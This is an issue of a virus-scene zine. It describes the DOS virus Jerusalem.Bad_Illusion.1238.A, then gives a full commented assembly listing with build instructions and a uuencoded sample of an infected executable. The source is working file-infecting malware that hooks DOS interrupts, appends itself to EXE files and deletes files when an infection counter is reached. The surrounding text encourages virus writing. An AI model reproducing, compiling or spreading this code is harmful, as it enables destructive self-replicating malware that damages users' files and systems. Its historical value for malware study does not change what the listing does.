Copy Link
Add to Bookmark
Report
Hexfiles Issue 4 File 005
HEX-FILES No. 4 File 005
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Jerusalem.Bad_Illusion.1238.A
a disassembly by
YeZ
yez@rocketmail.com
Name : Jerusalem.Bad_Illusion.1238.A
Author : XED
Origin : Cebu, Philippines
This virus infects EXE files only, It deletes files when the limit of
the counter is reached. It displays a message, something like:
"HA,HA,HA! BAD ILLUSIONS from U.C. (W) XED"
This virus has bugs. The original host program will not be executed
when the virus is initiating system infection due to some errors in
execution parameter...
Here's the entry of Jerusalem.Bad_Illusion.1238.A in the phil_av's
virus info (http://members.xoom.com/~phil_av/encyc.htm#BadIllusion)
which would give you a fuller description of the virus:
It installs in memory as a 1536-byte TSR plus its environment.
It redirects Int 21h (DOS) and infects on Fn 4B00h (execute
program) calls. It determines memory residency by loading AX
with CE12h on Int 21h call and it is resident if AX contains a
value other than CE00h on return. The resident virus returns
5700h in AX. It computes a checksum of its code before
installing in memory. If the check fails, the host program is
deleted and memory installation is aborted.
It only infects EXE programs, determined by checking the first
two bytes of a program for the "MZ" EXE file signature. Length
of infected programs increases by 1238 to 1253 bytes (1238 +0-15
byte alignment). It decreases available memory by 64 bytes for
every file infected.
The virus activates after infecting 15 programs. If it is
activated on
Sunday to Wednesday. It deletes the executing program, clears a
window in the middle of the screen and displays
HA,HA,HA! BAD ILLUSIONS from U.C. (W) XED
The system will then either reboot or hang.
Thursday to Saturday. It deletes the first file in the current
directory that does not have the hidden or system attribute. It
deletes file after every three infections thereafter. It cannot
delete a file if the first directory entry has the read-only
attribute, except if that is the executing program. It uses
offset 46h (for its ASCIIZ) and 81h (for its DTA) of the caller
program's data segment (as set in DS). This might create
problems to programs that use Int 21h Fn 4B00h, or retrieve
command-line information from the PSP. DOS displays error
messages if the virus attempts to delete a file from a write-
protected disk.
This virus originated from the same school as the Tadpoles virus
- U.C. (University of Cebu?)
There are two variants of this virus with minor differences.
ÄÄ JBADILLA.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS CONTAINS DESTRUCTIVE CODES ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS DOES INTENTIONAL DAMAGE ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±± ±
;±±±±± Virus Name: Jerusalem.Bad_Illusion.1238.A ±±±±±±±± HEX-FILES No. 4 ±
;±±±±± Author : XED ±±±±±±±± ±
;±±±±± Origin : Cebu, Philippines ±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±± ±±
;±±±±± COMPILING ±±±±±±±±±±±± TASM /m2 hf4list2; ±±
;±±±±± INSTRUCTION ±±±±±±±±±±±± TLINK /t hf4list2; ±±
;±±±±± ±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± Using other compilers might produce a ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± a new variant. ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±
;±±±±± Program listing created by YeZ <yez@rocketmail.com> ±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± Greetz: ±±
;±± ±±
;±±± XED: Write some more cool viruses man!!! ±±
;±±± All our readers, virus programmers and supporters out there... ±±
;±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± |YeZ| ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
EXEHead struc
EXESig dw ?
EXEImgLng dw ?
EXESecLng dw ?
EXENumReloc dw ?
EXEHeadLng dw ?
EXEMinAlloc dw ?
EXEMaxAlloc dw ?
EXESSDisp dw ?
EXESPOff dw ?
EXEChkSum dw ?
EXEIPOff dw ?
EXECSDisp dw ?
EXEMReloc dw ?
EXEOVLNum dw ?
EXEHead ends
BadIllusion segment page 'code'
assume cs:BadIllusion, ds:BadIllusion
VirSize equ offset VirusEnd - offset VirusStart
org 0
VirusStart:
jmp VirStack ; this should be filled with -1
;If you notice, there are a lot of uninitialized variables,
;this is probably part of the first generation codes :)
unkdat1 db 0dch,21h,0dch,0dfh,0cdh,32h,0bdh,0fbh
db 0fdh,0dfh,0cdh,21h,0,4dh,0,0,5eh,0,0,0
Counter db 0
HostName label dword
HostNameOff dw 0
HostNameSeg dw 0
PSPSeg dw 0
unkdat2 db 5 dup (?)
HostAttr dw 0
unkdat3 db 0
I21 label dword
I21Off dw 0
I21Seg dw 0
unkdat4 db 5 dup (?)
HostDate dw 0
HostTime dw 0
HostHandle dw 0
DrvAdd db 0
unkdat5 db 0
ExeSS dw 0
ExeSP dw 0
ExeCSIP label dword
ExeIP dw 0
ExeCS dw 0
I24 label dword
I24Off dw 0
I24Seg dw 0
unkdat6 db 3 dup (?)
EnvBlk equ $
EnvVar1 dw 0
EnvVar2 dw 0
EnvSeg1 dw 0
EnvVar3 dw 0
EnvSeg2 dw 0
EnvVar4 dw 0
EnvSeg3 dw 0
unkdat7 db 28h dup(0)
HostSizeLo dw 0
HostSizeHi dw 0
unkdat8 db 0
VirDTA db 2bh dup(0)
;
;This is the encrypted payload message...
;
EncMsg db 'HA,HA,HA! BAD ILLUSIONS from U.C. (W) XED$'
MsgLen equ $-EncMsg
Int21Proc:
pushf
cmp ax,0ce12h ;Check presence
je ChkPresence
cmp ax,4b00h ;Execute file (Virus authors favorite handler!)
je InfectHost
popf
jmp cs:[I21] ;Go back to real INT 21 chain
ChkPresence:
mov ax,5700h ;Yes Im here :)
popf
iret
InfectHost: ;Infect file entry...
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov cs:[HostNameOff],dx
mov cs:[HostNameSeg],ds
mov di,dx
xor dl,dl
cmp byte ptr [di+1],':' ;Are we executing program on another drive?
jne NoDrv
mov dl,[di]
and dl,1fh ;Mask our drive letter
NoDrv:
mov cs:[DrvAdd],dl
cmp cs:[Counter],15
jne LimitNotReach
mov ah,2ah ;Get systems date/time
int 21h
cmp al,3 ;Is it wednesday above ?
ja YesWednesdayAbove
lds dx,cs:[HostName] ;Get our Host Name
xor cx,cx
mov ax,4301h ;Make it write vulnerable(change attribute)
int 21h
mov ah,41h ;Wow Guess what??? :)
int 21h
mov ax,060ch ;Prepare our CRT
mov dx,0c40h
mov bh,7
mov cx,610h ; create a 6 x 48 window in
int 10h ; middle of screen
mov ah,2
mov bh,0
mov dx,914h ; bring cursor to row 9 col 20
int 10h
push cs
pop ds
mov dx,offset EncMsg
mov si,dx
mov cx,MsgLen
LoopLoadXor: ;Decrypt XED Bad Illusion Message
mov al,[si]
xor al,0ffh
mov [si],al
inc si
loop LoopLoadXor
mov dx,offset EncMsg
mov ah,9 ;And Display it
int 21h
retf ;Where are you going man (This will hang PC)
YesWednesdayAbove:
mov ah,1ah
mov dx,offset VirDTA
int 21h
mov word ptr [EnvVar1],'.*'
mov word ptr [EnvVar2],'$*'
mov dx,offset EnvBlk
mov ah,4eh ;Search for our victim
mov cx,20h
int 21h
mov dx,offset VirDTA+30 ;Get Victim's Name...
mov ah,41h
int 21h ; ....and delete
mov byte ptr cs:[Counter],12 ; reset counter
jmp DoneKill
LimitNotReach:
jb DoNotResetCount
mov byte ptr cs:[Counter],0
DoNotResetCount:
push cs
pop ds
push cs
pop es
mov dl,cs:[DrvAdd]
mov ah,36h ;Get disk free space
int 21h
cmp ax,0ffffh
jne NoErrOnSize
jmp PopAll
NoErrOnSize:
mul bx
mul cx
or dx,dx ;Is it more than enough?
jnz SizeOK
cmp ax,VirSize ;Is it sufficient?
jnb SizeOK
Jmp PopAll
SizeOK:
push ds
push es
mov ax,3524h
int 21h
mov cs:[I24Off],bx
mov cs:[I24Seg],es
push cs
pop ds
mov dx,offset Int24Proc ;Use our bogus INT 24
mov ax,2524h
int 21h
mov ah,1ah
mov dx,offset VirDTA
int 21h
pop es
pop ds
lds dx,cs:[HostName]
mov ax,4300h ;Get host attribute
int 21h
mov cs:[HostAttr],cx
mov ax,4301h ;Write enable the host program
mov cx,20h
int 21h
lds dx,cs:[HostName]
mov ax,3d02h ;Open the host file
int 21h
jnc NoErrOnOpen
jmp PopAll
NoErrOnOpen:
mov cs:[HostHandle],ax
mov bx,ax
xor cx,cx
xor dx,dx
mov ax,4202h ;Get host size
int 21h
jc ErrExit1
cmp ax,4 ;Is it more than 4 bytes ?
jb ErrExit1
mov cx,-1
mov dx,-11
mov ax,4202h ;Goto the last 10 bytes
int 21h
jc ErrExit1
push cs
pop ds
push cs
pop es
mov cx,16
mov dx,offset VirDTA
mov di,dx
mov ah,3fh ;Read last 10 bytes of the host program
int 21h
jc ErrExit2
mov cx,ax
mov al,0feh
RepeatScanByte1:
repne scasb
jne ProceedInfection
cmp cx,0
je ProceedInfection
dec di
and word ptr [di],5fh
cmp word ptr [di],5eh
je ChkIfInfected
jmp RepeatScanByte1
ChkIfInfected: ;Check if infected ?
xor word ptr [di+2],-1
cmp word ptr [di+2],6defh ;Check marker :)
jne ProceedInfection
CleanUpFileNRAM:
mov bx,cs:[HostHandle]
mov ah,3eh ;Close our host
int 21h
mov ax,2524h ;Return INT 24 vectors
lds dx,cs:[I24]
int 21h
DoneKill:
jmp PopAll
ProceedInfection:
push cs
pop ds
mov ax,5700h ;Get host date and time
int 21h
mov cs:[HostTime],cx
mov cs:[HostDate],dx
mov bx,4
mov ah,48h ;Allocate RAM
int 21h
ErrExit1:
jc ErrExit2
mov bx,cs:[HostHandle]
xor cx,cx
xor dx,dx
mov ax,4200h ;Goto Host header
int 21h
jc ErrExit2
push cs
pop ds
mov cx,28
mov dx,offset VirDTA
mov bx,cs:[HostHandle]
mov ah,3fh ;Read header
int 21h
ErrExit2:
jc ErrExit3
cmp word ptr [VirDTA.EXESig],5a4dh ;Is it an EXE file
jne CleanUpFileNRAM
mov ax,[VirDTA.EXESSDisp] ;Set up for infection
mov [ExeSS],ax
mov ax,[VirDTA.EXESPOff]
mov [ExeSP],ax
mov ax,[VirDTA.EXEIPOff]
mov [ExeIP],ax
mov ax,[VirDTA.EXECSDisp]
mov [ExeCS],ax
mov ax,[VirDTA.EXESecLng]
cmp word ptr [VirDTA.EXEImgLng],0
je Aligned1
dec ax
Aligned1:
mov bx,200h
mul bx
add ax,word ptr [VirDTA.EXEImgLng]
adc dx,0
add ax,0fh
adc dx,0
and ax,0fff0h
mov [HostSizeLo],ax ;Get dword size of our host program
mov [HostSizeHi],dx
add ax,VirSize
adc dx,0
ErrExit3:
jc ErrExit4
mov bx,200h
div bx
or dx,dx
jz Aligned2
inc ax
Aligned2:
mov [VirDTA.EXESecLng],ax
mov [VirDTA.EXEImgLng],dx
mov ax,[HostSizeLo]
mov dx,[HostSizeHi]
mov bx,10h
div bx
sub ax,[VirDTA.EXEHeadLng]
mov [VirDTA.EXECSDisp],ax ;New CS
mov word ptr [VirDTA.EXEIPOff],offset EntryVirus ;New IP
mov [VirDTA.EXESSDisp],ax ;New SS
mov word ptr [VirDTA.EXESPOff],offset VirStack ;New SP
xor cx,cx
mov dx,cx
mov ax,4200h ;Goto host header
mov bx,cs:[HostHandle]
int 21h
ErrExit4:
jc ErrRet2Host
mov cx,28
mov dx,offset VirDTA
mov ah,40h ;Write virus's new header
int 21h
jc ErrRet2Host
mov dx,[HostSizeLo]
mov cx,[HostSizeHi]
mov ax,4200h ;Goto the end of the host program
int 21h
jc ErrRet2Host
inc byte ptr cs:[Counter]
xor dx,dx
mov [HostSizeLo],dx
mov [HostSizeHi],dx
mov cx,VirSize
mov ah,40h ;Write our virus at the end of the host program.
int 21h
ErrRet2Host:
mov ah,49h ;Deallocate MCB
int 21h
mov cx,cs:[HostTime]
mov dx,cs:[HostDate]
mov ax,5701h ;Return host date and time
int 21h
mov ah,3eh ;close host program
int 21h
mov ax,2524h ;Return real INT 24
lds dx,cs:[I24]
int 21h
mov cx,cs:[HostAttr]
mov ax,4301h ;Return original host attribute
int 21h
PopAll:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp cs:[I21] ;Goto next INT 21 chain
Int24Proc: ;This is the virus's INT 24
xor al,al
iret
EntryVirus: ;Infected file entry point
mov ax,0ce12h ;Check if the system is already infected?
int 21h
cmp ax,0ce00h
je SystemNotInfected
mov ax,es ;Yes so return to host program
add ax,10h
add cs:[ExeCS],ax ;Set our CS
add cs:[ExeSS],ax ;and SS
mov ss,cs:[ExeSS] ;Return SS
mov sp,cs:[ExeSP] ;Return SP
jmp cs:[ExeCSIP] ;Jump to host program
SystemNotInfected:
mov cs:[PSPSeg],es ;Get our original PSP segment
push es
xor ax,ax
mov es,ax
mov word ptr es:[220h],0a5f3h ;REP MOVSW opcode
mov byte ptr es:[222h],0cbh ;RETF
pop ax
add ax,10h
mov es,ax
push cs
pop ds
mov cx,4d6h
shr cx,1
VirChkSumEnd:
xor si,si
xor di,di
push ax
mov ax,offset RetHere ;Returning offset
push ax
db 0eah ;\
dd 220h ;/ JMP 0000:0220
RetHere:
mov ax,cs
mov ss,ax
mov sp,600h
mov cs:[EnvSeg1],es ;Set up the environment
mov cs:[EnvSeg3],es
mov cs:[EnvSeg2],es
mov ax,5ch
mov cs:[EnvVar3],ax
add ax,10h
mov cs:[EnvVar4],ax
add ax,14h
mov cs:[EnvVar2],ax
xor ax,ax
mov cs:[EnvVar1],ax
mov ah,4ah
mov bx,70h
mov es,[PSPSeg]
int 21h
mov ax,3521h ;Get INT 21 VECTOR
int 21h
mov cs:[I21Off],bx
mov cs:[I21Seg],es
push ds
push cs
pop ds
mov dx,offset Int21Proc ;Set new INT 21 vector
mov ax,2521h
int 21h
pop ds
mov es,cs:[PSPSeg]
mov es,es:[2ch] ;Get Environment Segment
xor di,di
mov cx,7fffh
xor al,al
LoopNotEq: ;Search host name thru the environment :)
repne scasb
cmp es:[di],al
loopne LoopNotEq
mov dx,di
add dx,3
mov ax,4b00h ;Execute our Host program handler
push es
pop ds
push cs
pop es
mov cs:[EnvVar1],ds
mov bx,offset EnvBlk
mov byte ptr cs:[Counter],0
push ax
push bx
push dx
push ds
push cs
pop ds
mov dx,offset EncMsg
mov si,dx
mov cx,offset VirChkSumEnd
xor dx,dx
LoopAddDl:
lodsb
add dl,al
loop LoopAddDl
cmp dl,0ech ;Is our virus corrupted or modified ?
CxSum equ byte ptr $-1
je OkChkSum
mov ah,41h ;Yes then delete this host
pop ds ;someone is trying to lame the virus
pop dx
pop bx
pop cx
jmp cs:[I21]
OkChkSum:
pop ds
pop dx
pop bx
pop ax
pushf
call cs:[I21] ;Execute the host program now
mov ah,49h
int 21h
mov ah,4dh ;Get exec results
int 21h
mov ah,31h ;Go TSR
mov dx,((VirStack-VirusStart)/16) ;used this coz it is shorter than
int 21h ;(((VirusEnd-VirusStart)+100h)/16)+3
InfectionMark:
db 0feh
db 0dbh,10h,92h ;VIRUS MARKER !!!!
VirusEnd:
align 512
VirStack:
cli
mov ax,cs
mov ss,ax
mov sp,offset VirStack
sti
add ax,16
mov ds,ax
mov es,ax
push ax
mov ax,offset Reloc
push ax
retf
Reloc:
cld
mov word ptr ds:[VirusStart],-1 ;restores the same value found
mov byte ptr ds:[VirusStart][2],-1 ;in this loc on virii in the wild
mov si,offset EncMsg
push si
mov di,si
mov cx,MsgLen ; encrypt message
mov ah,-1
EncLoop:
lodsb
xor al,ah
stosb
loop EncLoop
pop si
mov cx,offset VirChkSumEnd
xor ah,ah
jmp CxSmLoop
YeZ db 13,10
db 'YeZ DisASM!',13,10
db 'Jerusalem.Bad_Illusion.1238.A virus',13,10,36
CxSmLoop:
lodsb
add ah,al
loop CxSmLoop
mov CxSum,ah ; set checksum value
mov ax,3521h
int 21h
mov [I21Off],bx
mov [I21Seg],es
mov dx,offset Int21Proc
mov ax,2521h
int 21h
mov ah,9
lea dx,YeZ
int 21h
push word ptr ss:[2ch]
pop es
mov ah,49h
int 21h
push ss
pop es
mov ah,49h
int 21h
mov ah,31h ;Go TSR
mov dx,((VirStack-VirusStart)/16)
int 21h
BadIllusion ends
end VirusStart
ÄÄ JBADILLA.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The infected file below was infected by a virus created when the source code
listed above was compiled in TASM 2.01.
ÄÄ JBADILLA.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644 jbadilla.exe
M35JV``4````@````__\>```&*M:Q`QX`'@````$`````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````-("`@#0I-86)U:&%Y(0T*"E1H:7,@:7,@2F5R
M=7-A;&5M+D)A9%]);&QU<VEO;BXQ,C,X+D$@=FER=7,@8V]M:6YG('1O('EO
M=2!F<F]M('1H92!0:&EL:7!P:6YE<RX-"D)R;W5G:'0@=&\@>6]U(&QI=F4@
M8GD@2$58+49)3$53($YO+B`T#0H*2$58+49)3$53(&%N9"!995H@87)E(&YO
M="!R97-P;VYS:6)L92!F;W(@86-T=6%L+"!I;7!L:65D(&%N9"]O<B!I;6%G
M:6YA<GD-"F1A;6%G92!A<FES:6YG(&1I<F5C=&QY(&]R(&EN9&ER96-T;'D@
M9G)O;2!T:&4@=7-E+"!M:7-U<V4@;W(@;F]N+75S92!O9@T*=&AI<R!P<F]G
M<F%M+B!4:&4@<&5R<V]N('=H;R!E>&5C=71E<R!T:&ES('!R;V=R86T@8F5A
M<G,@9G5L;"!R97-P;VYS:6)I;&ET>0T*9F]R(&AI<R]H97(@86-T:6]N<RX-
M"@I4:&ES('!R;V=R86T@:7,@<W1R:6-T;'D@9F]R(&5D=6-A=&EO;F%L(&]R
M(')E<V5A<F-H('!U<G!O<V5S(&]N;'DN#0H*"B0((!H.'[H$`+0)S2&T3,TA
MY@+____<(=S?S3*]^_W?S2$`30``7@````$U!2@.0!```````"```-8`X`\`
M`````#8E?8,%``$``````-$!``!5`2@.````.Q"``%`07`!0$&P`4!``````
M``````````````````````````````````````````````````````!-6K8`
M!0```"````#__QX```8JUK$#'@`>````````````````````````M[[3M[[3
MM[[>W[V^N]^VL[.JK+:PL:S?F8V0DM^JT;S1W]>HUM^GNKO;G#T2SG0+/0!+
M=`N=+O\N)@"X`%>=SU!345)65QX&+HD6&``NC!X:`(OZ,M*`?0$Z=06*%8#B
M'RZ(%C4`+H`^%P`/=7:T*LTA/`-W02[%%A@`,\FX`4/-(;1!S2&X#`:Z0`RW
M![D0!LT0M`*W`+H4"<T0#A^ZK`"+\KDJ`(H$-/^(!$;B][JL`+0)S2'+M!JZ
M@0#-(<<&1@`J+L<&2``J)+I&`+1.N2``S2&ZGP"T0<TA+L8&%P`,Z>(`<@8N
MQ@87```.'PX'+HH6-0"T-LTA/?__=0/I\P'WX_?A"])U"#W6!',#Z>,!'@:X
M)#7-(2Z)'C\`+HP&00`.'[JN`[@D)<TAM!JZ@0#-(0<?+L46&`"X`$/-(2Z)
M#B,`N`%#N2``S2$NQ188`+@"/<TA<P/IF0$NHS,`B]@SR3/2N`)"S2%R=3T$
M`')PN?__NO7_N`)"S2%R8PX?#@>Y$`"Z@0"+^K0_S2%R=(O(L/[RKG4Q@_D`
M="Q/@R5?@SU>=`+K[(-U`O^!?0+O;746+HL>,P"T/LTAN"0E+L46/P#-(>DK
M`0X?N`!7S2$NB0XQ`"Z)%B\`NP0`M$C-(7(A+HL>,P`SR3/2N`!"S2%R$0X?
MN1P`NH$`+HL>,P"T/\TA<DV!/H$`35IUI:&/`*,W`*&1`*,Y`*&5`*,[`*&7
M`*,]`*&%`(,^@P``=`%(NP`"]^,#!H,`@](`!0\`@](`)?#_HWP`B19^``76
M!(/2`')!NP`"]_,+TG0!0*.%`(D6@P"A?`"+%GX`NQ``]_,K!HD`HY<`QP:5
M`+$#HX\`QP:1```&,\F+T;@`0BZ+'C,`S2%R,;D<`+J!`+1`S2%R)8L6?`"+
M#GX`N`!"S2%R%B[^!A<`,]*)%GP`B19^`+G6!+1`S2&T2<TA+HL.,0`NBQ8O
M`+@!5\TAM#[-(;@D)2[%%C\`S2$NBPXC`+@!0\TA!Q]?7EI96UB=+O\N)@`R
MP,^X$L[-(3T`SG0>C,`%$``N`08]`"X!!C<`+HX6-P`NBR8Y`"[_+CL`+HP&
M'``&,\".P";'!B`"\Z4FQ@8B`LM8!1``CL`.'[G6!-'I,_8S_U"X"P10ZB`"
M``",R([0O``&+HP&2@`NC`92`"Z,!DX`N%P`+J-,``40`"ZC4``%%``NHT@`
M,\`NHT8`M$J[<`".!AP`S2&X(37-(2Z)'B8`+HP&*``>#A^ZU@"X(27-(1\N
MC@8<`":.!BP`,_^Y_W\RP/*N)C@%X/F+UX/"`[@`2P8?#@<NC!Y&`+M&`"[&
M!A<``%!34AX.'[JL`(ORN?T#,]*L`M#B^X#Z['0+M$$?6EM9+O\N)@`?6EM8
9G"[_'B8`M$G-(;1-S2&T,;I@`,TA_ML0D@``
`
end
ÄÄ JBADILLA.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<{[* HF4 *]}>=-